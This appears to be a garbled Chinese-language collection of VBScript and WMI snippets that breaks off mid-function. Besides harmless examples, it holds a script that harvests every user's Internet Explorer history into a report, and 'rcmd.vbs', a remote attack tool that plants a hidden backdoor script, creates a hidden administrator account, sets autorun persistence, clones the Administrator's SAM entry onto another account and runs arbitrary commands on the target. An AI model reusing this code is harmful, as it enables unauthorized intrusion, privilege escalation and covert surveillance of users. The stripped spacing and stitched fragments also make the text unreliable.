这是因为在ANSI和Unicode字符集中同一API函数的名称可能是不一样的，为了保证不出现声明错误，我们使用Alias关键字指出API函数的别名，一般来说在WIN9X平台下我们把API函数名后加一个大写A作为别名即可strComputer="." Set objCmdLib=CreateObject("Microsoft.CmdLib") Set objCmdLib.ScriptingHost=WScript.Application Set objWMIService=GetObject("winmgmts:\" & strComputer & "\root\cimv2") WScript.Echo objCmdLib.getHostName(objWMIService)

setww=createobject("wbemscripting.swbemlocator") setcc=ww.connectserver("172.20.241.218","root/cimv2","user","password") Setpp=cc.get("Win32_Process") pp.create("cmd/ctemp.exe") 　　以上程序在VisualBasic3.0/4.0上通过

' +----------------------------------------------------------------------------+ ' | Contact Info | ' +----------------------------------------------------------------------------+ ' Author: Vengy ' modiy:lcx ' Email : cyber_flash@hotmail.com ' Tested: win2K/XP (win9X not tested!) Option Explicit ' +----------------------------------------------------------------------------+ ' | Setup constants | ' +----------------------------------------------------------------------------+ Const conBarSpeed=80 Const conForcedTimeOut=3600000 ' 1 hour ' +----------------------------------------------------------------------------+ ' | Setup Objects and misc variables | ' +----------------------------------------------------------------------------+ Dim spyPath : spyPath="c:\spy.htm" '请自行修改 Dim oFSO : Set oFSO=CreateObject("Scripting.FileSystemObject") Dim oWShell : Set oWShell=CreateObject("WScript.Shell") Dim objNet : Set objNet=CreateObject("WScript.Network") Dim Env : Set Env=oWShell.Environment("SYSTEM") Dim arrFiles : arrFiles=Array() Dim arrUsers : arrUsers=Array() Dim HistoryPath : HistoryPath=Array() Dim objIE Dim objProgressBar Dim objTextLine1 Dim objTextLine2 Dim objQuitFlag Dim oTextStream Dim index Dim nBias ' +----------------------------------------------------------------------------+ ' | Whose been a naughty surfer? Let's find out! ;) | ' +----------------------------------------------------------------------------+ StartSpyScan ' +----------------------------------------------------------------------------+ ' | Outta here ... | ' +----------------------------------------------------------------------------+ CleanupQuit ' +----------------------------------------------------------------------------+ ' | Cleanup and Quit | ' +----------------------------------------------------------------------------+ Sub CleanupQuit() Set oFSO=Nothing Set oWShell=Nothing Set objNet=Nothing WScript.Quit End Sub ' +----------------------------------------------------------------------------+ ' | Start Spy Scan | ' +----------------------------------------------------------------------------+ Sub StartSpyScan() Dim index_folder, history_folder, oSubFolder, oStartDir, sFileRegExPattern, user LocateHistoryFolder index_folder=HistoryPath(0)&""&HistoryPath(1) If Not oFSO.FolderExists(index_folder) Then wsh.echo "No history folder exists. Scan Aborted." Else SetLine1 "Locating history files:" sFileRegExPattern="\index.dat$" Set oStartDir=oFSO.GetFolder(index_folder) For Each oSubFolder In oStartDir.SubFolders history_folder=oSubFolder.Path&""&HistoryPath(3)&""&HistoryPath(4)&""&"History.IE5" If oFSO.FolderExists(history_folder) Then If IsQuit()=True Then CleanupQuit End If user=split(history_folder,"") SetLine2 user(2) ReDim Preserve arrUsers(UBound(arrUsers) + 1) arrUsers(UBound(arrUsers))=user(2) Set oStartDir=oFSO.GetFolder(history_folder) RecurseFilesAndFolders oStartDir, sFileRegExPattern End If Next If IsEmpty(index) Then wsh.echo "No Index.dat files found. Scan Aborted." Else CreateSpyHtmFile RunSpyHtmFile End If End If End Sub ' +----------------------------------------------------------------------------+ ' | Locate History Folder | ' +----------------------------------------------------------------------------+ Sub LocateHistoryFolder() ' Example: C:\Documents and Settings\<username>\Local Settings\History ' HistoryPath(0)=C: ' HistoryPath(1)=Documents and Settings ' HistoryPath(2)=<username> ' HistoryPath(3)=Local Settings ' HistoryPath(4)=History HistoryPath=split(oWShell.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\History"),"") End Sub ' +----------------------------------------------------------------------------+ ' | Find ALL History Index.Dat Files | ' +----------------------------------------------------------------------------+ Sub RecurseFilesAndFolders(oRoot, sFileEval) Dim oSubFolder, oFile, oRegExp Set oRegExp=New RegExp oRegExp.IgnoreCase=True If Not (sFileEval="") Then oRegExp.Pattern=sFileEval For Each oFile in oRoot.Files If (oRegExp.Test(oFile.Name)) Then ReDim Preserve arrFiles(UBound(arrFiles) + 1) arrFiles(UBound(arrFiles))=oFile.Path index=1 ' Found at least one index.dat file! End If Next End If For Each oSubFolder In oRoot.SubFolders RecurseFilesAndFolders oSubFolder, sFileEval Next End Sub ' +----------------------------------------------------------------------------+ ' | Create Spy.htm file | ' +----------------------------------------------------------------------------+ Sub CreateSpyHtmFile() Dim ub, count, index_dat, user, spyTmp Set oTextStream=oFSO.OpenTextFile(spyPath,2,True) oTextStream.WriteLine "<html><title>IE is spying on you!</title><body><font size=2>Welcome "&objNet.UserName&"<br><br>" oTextStream.WriteLine "<b>"+CStr(UBound(arrUsers)+1)+" users surfed on your PC:</b><br>" For Each index_dat In arrUsers oTextStream.WriteLine "<font color=green>"+index_dat+"</font><br>" Next oTextStream.WriteLine "<br><table border='0' width='100%' cellspacing='0' cellpadding='0'>" oTextStream.WriteLine "<tr><td nowrap><b>User:</b></td><td nowrap><b> Date:</b></td><td nowrap><b> Link:</b></td></tr>" GetTimeZoneBias count=0 ub=UBound(arrFiles) For Each index_dat In arrFiles If IsQuit()=True Then oTextStream.Close CleanupQuit End If count=count+1 user=split(index_dat,"") SetLine1 "Scanning "+user(2)+" history files:" SetLine2 CStr(ub+1-count) spyTmp=oFSO.GetSpecialFolder(2)+"\spy.tmp" ' Copy index.dat ---> C:\Documents and Settings\<username>\Local Settings\Temp\spy.tmp ' REASON: Avoids file access violations under Windows.这里没有权限，我加了on error resume next On Error Resume next oFSO.CopyFile index_dat, spyTmp, True FindLinks "URL ", RSBinaryToString(ReadBinaryFile(spyTmp)), index_dat Next oTextStream.WriteLine "</table><br><b>Listing of history files:</b><br>" For Each index_dat In arrFiles oTextStream.WriteLine index_dat+"<br>" Next oTextStream.WriteLine "<br><b>Do you have an idea that would improve this spy tool? Share it with me!<b><br><a href= or Comments?</a></font><br><br><b>End of Report</b></body></html>" oTextStream.Close If oFSO.FileExists(spyTmp) Then oFSO.DeleteFile spyTmp End If End Sub ' +----------------------------------------------------------------------------+ ' | Get Time Zone Bias. | ' +----------------------------------------------------------------------------+ Sub GetTimeZoneBias() Dim nBiasKey, k nBiasKey=oWShell.RegRead("HKLM\System\CurrentControlSet\Control\TimeZoneInformation\ActiveTimeBias") If UCase(TypeName(nBiasKey))="LONG" Then nBias=nBiasKey ElseIf UCase(TypeName(nBiasKey))="VARIANT()" Then nBias=0 For k=0 To UBound(nBiasKey) nBias=nBias + (nBiasKey(k) * 256^k) Next End If End Sub ' +----------------------------------------------------------------------------+ ' | Find Links within Index.dat | ' +----------------------------------------------------------------------------+ Sub FindLinks(strMatchPattern, strPhrase, file) Dim oRE, oMatches, oMatch, dt, start, sArray, timeStamp, url Set oRE=New RegExp oRE.Pattern=strMatchPattern oRE.Global=True oRE.IgnoreCase=False Set oMatches=oRE.Execute(strPhrase) For Each oMatch In oMatches start=Instr(oMatch.FirstIndex + 1,strPhrase,": ") If start <> 0 Then sArray=Split(Mid(strPhrase,start+2),"@") url=Left(sArray(1),InStr(sArray(1),chr(0))) dt=AsciiToHex(Mid(strPhrase,oMatch.FirstIndex+1+16,8)) timeStamp=cvtDate(dt(7)&dt(6)&dt(5)&dt(4),dt(3)&dt(2)&dt(1)&dt(0)) 'oTextStream.WriteLine "<nobr>" & sArray(0) & " - " & timeStamp & " - " & "<a href="">"&url&"</a> - " & file & " - " & CStr(oMatch.FirstIndex + 1) & "</nobr><br>" 'Visit User + Date + Visited URL oTextStream.WriteLine "<tr><td nowrap><font color=green size=2>"&sArray(0)&"</font></td>"+"<td nowrap><font color=red size=2> "&timeStamp&"</font></td>"&"<td nowrap><font size=2> <a href="">"&url&"</a></font></td></tr>" End If Next End Sub ' +----------------------------------------------------------------------------+ ' | Convert a 64-bit value to a date, adjusted for local time zone bias. | ' +----------------------------------------------------------------------------+ Function cvtDate(hi,lo) On Error Resume Next cvtDate=#1/1/1601# + (((cdbl("&H0" & hi) * (2 ^ 32)) + cdbl("&H0" & lo))/600000000 - nBias)/1440 ' CDbl(expr)-Returns expr converted to subtype Double. ' If expr cannot be converted to subtype Double, a type mismatch or overflow runtime error will occur. cvtDate=CDate(cvtDate) If Err.Number <> 0 Then 'WScript.Echo "Oops! An Error has occured - Error number " & Err.Number & " of the type '" & Err.description & "'." On Error GoTo 0 cvtDate=#1/1/1601# Err.Clear End If On Error GoTo 0 End Function ' +----------------------------------------------------------------------------+ ' | Turns ASCII string sData into array of hex numerics. | ' +----------------------------------------------------------------------------+ Function AsciiToHex(sData) Dim i, aTmp() ReDim aTmp(Len(sData) - 1) For i=1 To Len(sData) aTmp(i - 1)=Hex(Asc(Mid(sData, i))) If len(aTmp(i - 1))=1 Then aTmp(i - 1)="0"+ aTmp(i - 1) Next ASCIItoHex=aTmp End Function ' +----------------------------------------------------------------------------+ ' | Converts binary data to a string (BSTR) using ADO recordset. | ' +----------------------------------------------------------------------------+ Function RSBinaryToString(xBinary) Dim Binary 'MultiByte data must be converted To VT_UI1 | VT_ARRAY first. If vartype(xBinary)=8 Then Binary=MultiByteToBinary(xBinary) Else Binary=xBinary Dim RS, LBinary Const adLongVarChar=201 Set RS=CreateObject("ADODB.Recordset") LBinary=LenB(Binary) If LBinary>0 Then RS.Fields.Append "mBinary", adLongVarChar, LBinary RS.Open RS.AddNew RS("mBinary").AppendChunk Binary RS.Update RSBinaryToString=RS("mBinary") Else RSBinaryToString="" End If End Function ' +----------------------------------------------------------------------------+ ' | Read Binary Index.dat file. | ' +----------------------------------------------------------------------------+ Function ReadBinaryFile(FileName) Const adTypeBinary=1 Dim BinaryStream : Set BinaryStream=CreateObject("ADODB.Stream") BinaryStream.Type=adTypeBinary BinaryStream.Open BinaryStream.LoadFromFile FileName ReadBinaryFile=BinaryStream.Read BinaryStream.Close End Function ' +----------------------------------------------------------------------------+ ' | save Spy.htm file | ' +----------------------------------------------------------------------------+ Sub RunSpyHtmFile() If not oFSO.FileExists(spyPath) Then CleanupQuit Else wsh.echo "已保存在c:\spy.htm" End If End Sub Private sub SetLine1(sNewText) On Error Resume Next objTextLine1.innerTEXT=sNewText End Sub Private sub SetLine2(sNewText) On Error Resume Next objTextLine2.innerTEXT=sNewText End Sub Private function IsQuit() On Error Resume Next IsQuit=True If objQuitFlag.Value<>"quit" Then IsQuit=False End If End Function ' +----------------------------------------------------------------------------+ ' | All good things come to an end. | ' +----------------------------------------------------------------------------+ 1．要打开设置系统时间的控制面板文件（Timedate.cpl),只需运行如下代码：Shell"Rundll32.exeShell32.dll,Control_RunDLLTimedate.cpl"至于打开其他控制面板文件，相信您一定能够举一反三，尝试一下，换个文件名就成了

strComputer="." Set objWMIService=GetObject("winmgmts:\" & strComputer & "\root\wmi") Set colMonitoredEvents=objWMIService.ExecNotificationQuery _ ("Select * from MSNdis_StatusMediaDisconnect") Do While True Set strLatestEvent=colMonitoredEvents.NextEvent Wscript.Echo "A network connection has been lost:" WScript.Echo strLatestEvent.InstanceName, Now Wscript.Echo Loop 本范例是以一个stdPicture物件来存图形，之後於PictureBox中以特殊效果来显示

使用：D:\>iget.vbs 4.rcmd.vbs '*************** 'rcmd.vbsby黑嘿黑 '*************** onerrorresumenext setoutstreem=wscript.stdout setinstreem=wscript.stdin if(lcase(right(wscript.fullname,11))="wscript.exe")then setobjShell=wscript.createObject("wscript.shell") objShell.Run("cmd.exe/kcscript//nologo"&chr(34)&wscript.scriptfullname&chr(34)) endif ifwscript.arguments.count<3then usage() wscript.echo"Notenoughparameters." wscript.quit endif ipaddress=wscript.arguments(0) username=wscript.arguments(1) password=wscript.arguments(2) usage() outstreem.write"Conneting"&ipaddress&"...." setobjlocator=createobject("wbemscripting.swbemlocator")'20 setobjswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password) objswbemservices.security_.privileges.add23,true objswbemservices.security_.privileges.add18,true objswbemservices.security_.privileges.add7,true objswbemservices.security_.privileges.add11,true iferrornumber<>0then wscript.echo"Error!" callmain() else wscript.echo"OK!" endif callmain() '*********************************************************** functiondoor() outstreem.write"Creatingtheblankdoor.." setobjinstproc=objswbemservices.get("win32_process") cmddoor="cmd/cechodimwsh,FA,FSO,t>%windir%\system32\svrer.vbs"_ &"&&echosetfso=CreateObject(""Scripting.FileSystemObject"")>>%windir%\system32\svrer.vbs"_ &"&&echoSetFA=FSO.GetFile(WScript.scriptFullName)>>%windir%\system32\svrer.vbs"_ &"&&echoFA.Attributes=34>>%windir%\system32\svrer.vbs"_ &"&&echosett=fso.CreateTextFile(""%windir%\system32\SYSTEM.bat"",true)>>%windir%\system32\svrer.vbs"_ &"&&echot.WriteLine(""netuserIUSE_SERVERxyhack.91i.net/add"")>>%windir%\system32\svrer.vbs"_ &"&&echot.WriteLine(""netlocalgroupadministratorsIUSE_SERVER/add"")>>%windir%\system32\svrer.vbs"_ &"&&echot.WriteLine(""Attrib+h%windir%\system32\SYSTEM.bat"")>>%windir%\system32\svrer.vbs"_ &"&&echot.Close>>%windir%\system32\svrer.vbs"_ &"&&echosetwsh=CreateObject(""WScript.Shell"")>>%windir%\system32\svrer.vbs"_ &"&&echowsh.run""netuserIUSE_SERVERxyhack.91i.net/add"",0,true>>%windir%\system32\svrer.vbs"_ &"&&echowsh.run""netlocalgroupadministratorsIUSE_SERVER/add"",0,true>>%windir%\system32\svrer.vbs"_ &"&&echowsh.Regwrite ""HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs"_ &"&&echowsh.Regwrite ""HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"",0,""REG_DWORD"">>%win dir%\system32\svrer.vbs"_ &"&&echowsh.regwrite""HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs"_ &"&&echowsh.regwrite""HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs"_ &"&&echowsh.run""cmd/cat20:00,20:10,20:20,20:30%windir%\system32\SYSTEM.bat"",0,true >>%windir%\system32\svrer.vbs" objinstproc.create(cmddoor) showerror(err.number) Wscript.Sleep(1500) outstreem.write"Runingtheblankdoor.." objinstproc.create("cmd/ccscript%windir%\system32\svrer.vbs") showerror(err.number) callmain() endfunction '*********************************************************** functionca() Wscript.Echo"enterthecausername:" causername=WScript.StdIn.Readline() Wscript.Echo"enterthecapassword:" capassword=WScript.StdIn.Readline() outstreem.write"GettingSIDof"&causername&"...." setcolinstsid=objswbemservices.execquery("select*fromwin32_useraccountwherename="&chr(34)&causername&chr(34)) foreachobjinstsidincolinstsid strsid=objinstsid.sid sidflag=right(strsid,len(strsid)-instrrev(strsid,"-")) strflag=cstr(hex(sidflag)) regname=string(8-len(strflag),"0")&strflag next ifstrsid=""then wscript.echo"Error."&vbcrlf&"Usernameisnotexist." callmain() else wscript.echo"OK!" endif outstreem.write"Prepairing.." setobjinstproc=objswbemservices.get("win32_process") showerroronly(err.number) cmdline="cmd/cechosetoreg=getobject(""winmgmts:root\default:stdregprov"")>%temp%\ca.vbs"_ &"&&echooreg.getbinaryvalue^&h80000002,""SAM\SAM\Domains\Account\Users\000001F4"",""F"",uvalue>>%temp%\ca.vbs"_ &"&&echooreg.setbinaryvalue^&h80000002,""SAM\SAM\Domains\Account\Users"?name&""",""F"",uvalue>>%temp%\ca.vbs"_ &"&&echosetsh=createobject(""wscript.shell"")>>%temp%\ca.vbs"_ &"&&echosh.regwrite""HKLM\SOFTWARE\Microsoft\WindowsScriptHost\Settings\caflag"",""1"">>%temp%\ca.vbs" objinstproc.create(cmdline) showerroronly(err.number) cmdline="cmd/cechoatime=time>%temp%\getsys.vbs"_ &"&&echosetsh=createobject(""wscript.shell"")>>%temp%\getsys.vbs"_ &"&&echosh.run""cmd/cat23:59cscript%temp%\ca.vbs"",0,true>>%temp%\getsys.vbs"_ &"&&echosh.run""cmd/ctime23:58:59.90"",0,true>>%temp%\getsys.vbs"_ &"&&echowscript.sleep(1100)>>%temp%\getsys.vbs"_ &"&&echosh.run""cmd/ctime""^&atime,0,true>>%temp%\getsys.vbs" objinstproc.create(cmdline) showerror(err.number) outstreem.write"Processing." setcolinstsvr=objswbemservices.execquery("select*fromwin32_servicewherename='schedule'") showerroronly(err.number) foreachobjinstsvrincolinstsvr flag1=0 flag2=0 ifobjinstsvr.startmode="Disabled"then objinstsvr.changestartmode("Manual") flag1=1 endif ifobjinstsvr.started=flasethen errnumber=objinstsvr.startservice() flag2=1 endif showerroronly(err.number) objinstproc.create("cmd/ccscript%temp%\getsys.vbs") showerroronly(err.number) setobjinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov") fori=1to20 objinstreg.getstringvalue&h80000002,"SOFTWARE\Microsoft\WindowsScriptHost\Settings","caflag",svalue ifsvalue="1"then exitfor else wscript.sleep(500) endif next objinstproc.create("netuser"&causername&""&capassword) ifflag1thenobjinstsvr.changestartmode("Disabled") ifflag2thenobjinstsvr.stopservice() next ifsvalue<>"1"then wscript.echo"Error."&vbcrlf&"Waitingtimeout." else showerror(err.number) endif outstreem.write"CleanUp.." objinstproc.create("cmd/cdel%temp%\ca.vbs") showerroronly(err.number) objinstproc.create("cmd/cdel%temp%\getsys.vbs") showerroronly(err.number) ifsvalue="1"thenobjinstreg.deletevalue&h80000002,"SOFTWARE\Microsoft\WindowsScriptHost\Settings","caflag" showerror(err.number) callmain() endfunction functionshowerroronly(errornumber) iferrornumberThen wscript.echo"Error0x"&cstr(hex(err.number))&"." iferr.description<>""then wscript.echo"Errordescription:"&err.description&"." endif callmain() else outstreem.write"." endif endfunction '*********************************************************** functionshare() Wscript.Echostring(18,"-") Wscript.Echo"0.返回CMD>=" wscript.echo"1.列出共享信息:=" Wscript.Echo"2.创建共享=" Wscript.Echo"3.删除共享=" Wscript.Echostring(18,"-") Wscript.Echo"pleasechosetheparameter:" parameters=WScript.StdIn.Readline() SelectCaseparameters case"quit","0" main() case"list","1" listshare() case"open","2"'40 openshare() case"close","3" closeshare() endSelect endfunction functionlistshare() outstreem.write"ListingtheNetsharefrom"&ipaddress&"...." SetcolShares=objswbemservices.ExecQuery("Select*fromWin32_Share") showerror(err.number)'50 wscript.echo_ ("Caption"&chr(9)&chr(9)&"Name:"&chr(9)&chr(9)&"Path") ForeachobjShareincolShares wscript.echo_ (objShare.Caption&chr(9)&objShare.Name&chr(9)&chr(9)&objShare.Path) Next wscript.echovbcrlf&"AllSharehavebeenlistedSuccessfully!" callshare() endfunction functionopenshare() wscript.echo"Enterthepath:"'70 path=WScript.StdIn.Readline() wscript.echo"Enterthename:" sname=WScript.StdIn.Readline() ConstFILE_SHARE=0 ConstMAXIMUM_CONNECTIONS=25 SetobjNewShare=objswbemservices.Get("Win32_Share") errReturn=objNewShare.Create_ (path,sname,FILE_SHARE,_ MAXIMUM_CONNECTIONS,"默认共享") wscript.echo"ThenSharehavebeenCeatedSuccessfully!" callshare() endfunction functioncloseshare() wscript.echo"PleseEnterThename:" kname=WScript.StdIn.Readline() outstreem.write"killingthe"&kname&"...." SetcolShares=objswbemservices.ExecQuery_ ("Select*fromWin32_ShareWhereName="&"'"&kname&"'") ForEachobjShareincolShares objShare.Delete Next showerror(err.number) callshare() endfunction '*********************************************************** functionlistsvr() outstreem.write"ListingtheServicefrom"&ipaddress&"...." SetcolListOfServices=objswbemservices.ExecQuery_ ("Select*fromWin32_Service") showerror(err.number) wscript.echo_ ("Name"&chr(9)&chr(9)&"State"&chr(9)&chr(9)&"Mode"&chr(9)&"PathName") ForEachobjServiceincolListOfServices iflen(objService.name)<8then strname=objService.name&chr(9) else strname=objService.name endif wscript.echo_ (strname&chr(9)&objService.State&chr(9)&chr(9)&objService.StartMode&chr(9)&objService.PathName) Next wscript.echovbcrlf&"AllServiceshavebeenlistedSuccessfully!" callmain() endfunction '************************************************************ functionreboot() outstreem.write"Now,restartingtarget...." strwqlquery="select*fromwin32_operatingsystemwhereprimary='true'" setcolinstances=objswbemservices.execquery(strwqlquery) foreachobjinstanceincolinstances objinstance.win32shutdown(6) next showerror(err.number) callmain() endfunction '************************************************************* functioninf() outstreem.write"GettingInfomationfrom"&ipaddress&"...." setobj1=objget("win32_computersystem") showerror(err.number) wscript.echo""&vbcrlf setobj2=objget("win32_operatingsystem") setcol3=objswbemservices.instancesof("win32_processor") setobj4=objget("win32_logicalmemoryconfiguration") setobj5=objget("win32_bios") setobj6=objget("win32_displayconfiguration") setcol7=objswbemservices.instancesof("win32_diskdrive") setcol8=objswbemservices.instancesof("win32_logicaldisk") setcol9=objswbemservices.instancesof("win32_networkadapterconfiguration") setcol10=objswbemservices.instancesof("win32_quickfixengineering") wnl"OSInfo:" wnl"ComputerName:"&obj1.name wnl"UserName:"&obj1.username wnl"Domain:"&obj1.domain domainrole="" selectcaseobj1.domainrole case0 domainrole="Workstation" case1 domainrole="MemberWorkstation" case2 domainrole="Server" case3 domainrole="MemberServer" case4 domainrole="BackupDomainController" case5 domainrole="MainDomainController" endselect withobj2 wnl"DomainRole:"&domainrole wnl"Caption:"&.caption wnl"Organization:"&.organization wnl"RegisteredUser:"&.registereduser wnl"InstallDate:"&timeformat(.installdate) wnl"LastBootUpTime:"&timeformat(.lastbootuptime) wnl"WindowsDirectory:"&.windowsdirectory wnl"SystemDirectory:"&.systemdirectory wnl"BootDevice:"&.bootdevice wnl"CountryCode:"&.countrycode wnl"CSName:"&.csname wnl"Description:"&.description wnl"Manufacturer:"&.manufacturer wnl"SerialNumber:"&.serialnumber wnl"Version:"&.version wnl"SystemType:"&obj1.systemtype wnl"SystemStartupDelay:"&obj1.systemstartupdelay&"s" wnl"SystemStartupOptions:"&obj1.systemstartupoptions(0) fori=1toubound(obj1.systemstartupoptions) wnlspace(28)&obj1.systemstartupoptions(i) next endwith wnlvbcrlf&"ProcessorInfo:" wnl"NumberOfProcessors:"&obj1.numberofprocessors foreachobj3incol3 withobj3 wnl"DeviceID:"&.deviceid wnl"Name:"&.name wnl"CurrentClockSpeed:"&.currentclockspeed&"MHz" wnl"Description:"&.description wnl"ExtClock:"&.extclock&"MHz" wnl"L2CacheSize:"&.l2cachesize&"KB" wnl"L2CacheSpeed:"&.l2cachespeed&"MHz" wnl"ProcessorId:"&.processorid wnl"Manufacturer:"&.manufacturer wnl"SocketDesignation:"&.socketdesignation wnl"AddressWidth:"&.addresswidth&"Bit" wnl"DataWidth:"&.datawidth&"Bit" endwith next withobj4 wnlvbcrlf&"MemoryInfo:" wnl"TotalPhysicalMemory:"&cint(.totalphysicalmemory/1024)&"MB" wnl"FreePhysicalMemory:"&cint(obj2.freephysicalmemory/1024)&"MB" wnl"TotalPageFileSpace:"&cint(.totalpagefilespace/1024)&"MB" wnl"TotalVirtualMemory:"&cint(.totalvirtualmemory/1024)&"MB" wnl"AvailableVirtualMemory:"&cint(.availablevirtualmemory/1024)&"MB" endwith wnlvbcrlf&"BIOSInfo:" wnl"Description:"&obj5.description wnl"CurrentLanguage:"&obj5.currentlanguage wnl"Version:"&obj5.version wnl"Manufacturer:"&obj5.manufacturer withobj6 wnlvbcrlf&"DisplayConfiguration:" wnl"Caption:"&.caption wnl"DeviceName:"&.devicename wnl"DriverVersion:"&.driverversion wnl"DisplayFrequency:"&.displayfrequency&"Hz" wnl"BitsPerPel:"&.bitsperpel&"Bit" wnl"Pels:"&.pelswidth&"x"&.pelsheight endwith wnlvbcrlf&"DiskInfo:" foreachobj7incol7 withobj7 wnl"DeviceID:"&.deviceid wnl"Caption:"&.caption wnl"InterfaceType:"&.interfacetype wnl"SCSIBus:"&.scsibus wnl"SCSILogicalUnit:"&.scsilogicalunit wnl"SCSIPort:"&.scsiport wnl"SCSITargetId:"&.scsitargetid wnl"SectorsPerTrack:"&.sectorspertrack&"KB" wnl"Partitions:"&.partitions wnl"Size:"&sizeformat(.size) endwith next str="Volume"+space(2)+"Type"+space(8)+"Format"+space(4) str=str+"Size"+space(6)+"Free"+space(12)+"Label" wnlstr foreachobj8incol8 withobj8 drivetype="" selectcase.drivetype case0 drivetype="Unknow" case1 drivetype="NoRootDir" case2 drivetype="Removable" case3 drivetype="Fixed" case4 drivetype="Network" case5 drivetype="CD-ROM" case6 drivetype="RAM" endselect strpercent="" if.size<>""and.freespace<>""then strpercent="("&formatpercent(.freespace/.size,0)&")" endif str=""&wsp(.caption,8)&wsp(drivetype,12)&wsp(.filesystem,10)&wsp(sizeformat(.size),10) str=str&wsp(sizeformat(.freespace)&strpercent,16)&.volumename wnlstr endwith next wnlvbcrlf&"NICInformaton:" foreachobj9incol9 withobj9 if.IPEnabledthen wnl"Index:"&.index wnl"Description:"&.description wnl"DHCPEnabled:"&.dhcpenabled wnl"DHCPServer:"&.dhcpserver wnl"DNSHostName:"&.dnshostname wnl"DNSServerSearchOrder:"&wfl(.dnsserversearchorder) wnl"WINSPrimaryServer:"&.winsprimaryserver wnl"IPAddress:"&wfl(.ipaddress) wnl"MACAddress:"&.macaddress wnl"DefaultIPGateway:"&wfl(.defaultipgateway) wnl"IPSubnet:"&wfl(.ipsubnet) wnl"IPFilterSecurityEnabled:"&.ipfiltersecurityenabled wnl"IPSecPermitIPProtocols:"&wfl(.ipsecpermitipprotocols) wnl"IPSecPermitTCPPorts:"&wfl(.ipsecpermittcpports) wnl"IPSecPermitUDPPorts:"&wfl(.ipsecpermitudpports) endif endwith next wnlvbcrlf&"HotFixesInfo:" foreachobj10incol10 wnl"HotFixID:"&obj10.hotfixid wnl"FixComments:"&obj10.fixcomments wnl"InstallDate:"&obj10.installdate wnl"ServicePackInEffect:"&obj10.servicepackineffect next wnlvbcrlf&"Applications:" setobjswb1=objlocator.connectserver(ipaddress,"root/default",username,password) setobj11=objswb1.get("stdregprov") HKLM=&h80000002 keypath="SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" obj11.enumkeyHKLM,keypath,keyarray redimstr(ubound(keyarray)+1) j=0 fori=0toubound(keyarray) obj11.getstringvalueHKLM,keypath+keyarray(i),"displayname",strvalue ifstrvalue<>""then str(j)=strvalue j=j+1 endif next ifj>1then fori=0toj-1 fork=0toj-i-1 ifstrcomp(str(k),str(k+1),1)=1then strtemp=str(k+1) str(k+1)=str(k) str(k)=strtemp endif next next endif fori=0toj-1 wnl""&str(i) next wscript.echo""&vbcrlf wscript.echo"TheInfomationfrom&ipaddress&hadbeenlistedSuccessfully!" callmain() endfunction subwnl(msg) wscript.echomsg ifisobject(of)then onerrorresumenext of.writelinemsg showerror() onerrorgoto0 endif endsub functionwfl(byrefobj) str="" fori=0toubound(obj) str=str&obj(i)&"" next wfl=str endfunction functionwsp(msg,num) ifmsg<>""then msg=left(msg,num-1) wsp=msg&space(num-len(msg)) else wsp=space(num) endif endfunction functiontimeformat(msg) timeformat=left(msg,4)&"/"&mid(msg,5,2)&"/"&mid(msg,7,2)&""&mid(msg,9,2)&":"&mid(msg,11,2)&":"&mid(msg,13,2) endfunction functionsizeformat(msg) ifmsg<>""then size=msg/1048576 ifsize>1024then sizeformat=round(size/1024,2)&"GB" else sizeformat=round(size,1)&"MB" endif endif endfunction functionobjget(msg) setcol=objswbemservices.instancesof(msg) foreachobjxincol setobj=objx next setobjget=obj endfunction '****************************************** functioncommand() wscript.echo"PleseEnterTheCommand:" callrun() endfunction functionrun() strcmdline=WScript.StdIn.Readline() ifstrcmdline="exit"orstrcmdline="quit"orstrcmdline="0"then callmain() endif outstreem.write"Runningthecommand...." setobjinstance=objswbemservices.get("win32_process") setobjmethod=objinstance.methods_("create") setobjinparam=objmethod.inparameters.spawninstance_() objinparam.commandline=strcmdline setobjoutparam=objinstance.execmethod_("create",objinparam) ifobjoutparam.returnvalue<>0then wscript.echo"Error!" callcommand() else wscript.echo"OK!" endif wscript.echo"TheProcessIDis"&objoutparam.processid wscript.echo"Runingcommand:"&strcmdline&".to"&ipaddress&"Successfully!"&vbcrlf callcommand() endfunction '******************************************* functionpslist() outstreem.write"Listingprocess...." setcolinstances=objswbemservices.execquery("select*fromwin32_process") showerror(err.number) wscript.echovbcrlf&"Name"&chr(9)&chr(9)&"Pid"&chr(9)&"ExecutablePath" foreachobjinstanceincolinstances iflen(objinstance.name)<8then strname=objinstance.name&chr(9) else strname=objinstance.name endif wscript.echostrname&chr(9)&objinstance.handle&chr(9)&objinstance.executablepath next wscript.echovbcrlf&"AllprocesshavebeenlistedSuccessfully!" callmain() endfunction '***************************************** functionpskill() wscript.echo"pleseentertheprocess'sid:" strprocess=WScript.StdIn.Readline() outstreem.write"Killingid="&strprocess&"process...." setobjinstance=objswbemservices.get("win32_process.handle="&"'"&strprocess&"'") ifvartype(objinstance)<>vbobjectthen wscript.echovbcrlf&"Specifiedprocessisnotexist." callmain() else setobjmethod=objinstance.methods_("terminate") setobjinparam=objmethod.inparameters.spawninstance_() objinparam.reason=0 setobjoutparam=objinstance.execmethod_("terminate",objinparam) showerror(objoutparam.returnvalue) wscript.echo"Theprocess'sid="&strprocess&"havebeenkilledSuccessfully!" endif callmain() endfunction '******************************************************** functiontelnet() outstreem.write"Queryingstateoftelnetserver...." setobjswbemservices=objlocator.connectserver(ipaddress,"root\cimv2",username,password) setcolinstances=objswbemservices.execquery("select*fromwin32_servicewherename='tlntsvr'") showerror(err.number) foreachobjinstanceincolinstances ifobjinstance.startmode="Disabled"then outstreem.write"Telnetserverhasbeendisabled.Nowchangeingstartmodetomanual...." setobjmethod=objinstance.methods_("changestartmode") setobjinparam=objmethod.inparameters.spawninstance_() objinparam.startmode="Manual" setobjoutparam=objinstance.execmethod_("changestartmode",objinparam) showerror(objoutparam.returnvalue) endif outstreem.write"Changeingstate...." ifobjinstance.started=truethen 